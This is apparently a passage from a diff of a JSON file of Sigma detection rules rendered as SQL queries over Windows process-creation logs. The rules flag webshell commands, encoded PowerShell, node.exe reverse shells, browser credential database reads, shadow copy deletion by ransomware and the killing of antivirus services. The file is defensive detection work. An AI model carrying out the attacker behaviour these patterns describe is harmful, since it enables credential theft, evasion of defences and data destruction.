'%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ + "attack.privilege_escalation", "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.t1033" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "status": "test", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ], - "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_pua_chisel.yml" - }, - { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" - }, - { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.execution", - "attack.t1574.002" + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", - "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" - }, - { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", - "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "falsepositives": [ - "Legitimate software creating script event consumers" + "attack.defense_evasion", + "attack.t1127" ], - "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "status": "experimental", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], @@ -10299,73 +9981,28 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential NTLM Coercion Via 